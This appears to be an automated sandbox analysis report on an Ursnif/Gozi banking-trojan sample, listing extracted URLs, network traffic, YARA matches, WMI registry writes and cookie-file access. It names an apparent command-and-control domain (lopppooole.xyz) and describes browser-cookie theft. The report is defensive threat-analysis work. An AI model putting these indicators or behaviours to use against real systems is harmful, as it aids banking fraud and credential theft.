Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: regsvr32.exe, powershell.exe, 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, powershell.exe, 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000020.00000003.432471117.000001AE5AF68000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, regsvr32.exe, 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, powershell.exe, 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: imagestore.dat.26.dr	String found in binary or memory: http://lopppooole.xyz/favicon.ico
Source: imagestore.dat.26.dr, imagestore.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/favicon.ico~
Source: {DD24AED3-5B36-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/9dBougJwDtiqZ/QQHMIVU_/2BhS1knkkKX_2FVufwZ0oyN/EbGuCLEAI8/LnviyVmU_2B
Source: ~DF4C57DF82C221FA30.TMP.3.dr, {DD24AED7-5B36-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/vZLK0d4lARH3Q_2BrO_/2FsO_2F2nRs6X2oi1Zey6b/w_2BPzCyb9qWu/aUJj6fj9/AoW
Source: {DD24AED5-5B36-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/vduANE3J_2Bc1JVCe/mGf1TVDsPl7d/IwOe5xT417F/r0djERcwNagbl3/secUFuGZN4k
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000020.00000003.432706783.000001AE5AF32000.00000004.00000001.sdmp, powershell.exe, 00000020.00000002.436229660.000001AE42CDF000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 00000020.00000002.435921934.000001AE42AD1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000020.00000003.432706783.000001AE5AF32000.00000004.00000001.sdmp, powershell.exe, 00000020.00000002.436229660.000001AE42CDF000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 00000020.00000003.432706783.000001AE5AF32000.00000004.00000001.sdmp, powershell.exe, 00000020.00000002.436229660.000001AE42CDF000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611125209&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611125209&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611125210&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611125209&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cTAhN.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch&ued=https%
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpC
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bei-den-steuern-brauchts-jetzt-keine-unterschrift-mehr/ar-BB1cS
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/depression-wird-zum-schulstoff/ar-BB1cTOQU?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-steuererkl%c3%a4rung-wird-digital-wie-z%c3%bcrcherinnen-und
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/im-alterszentrum-sydef%c3%a4deli-geschah-ein-tragischer-corona-
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/j%c3%bcdisches-online-treffen-mit-hitler-und-porno-bildern-gest
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/meta-hiltebrand-prangert-anonymen-hassbrief-an/ar-BB1cTJHG?ocid
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sch%c3%bcler-positiv-auf-corona-mutation-getestet-alle-in-quara
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sozialdemokraten-bef%c3%bcrworten-sozialdetektive/ar-BB1cTS5w?o
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/steuerhinterziehung-mit-hochkar%c3%a4tiger-kunst-in-der-causa-s
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wenn-das-ganze-schulhaus-unter-quarant%c3%a4ne-gestellt-wird-wi
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49741 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_0439CB16

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

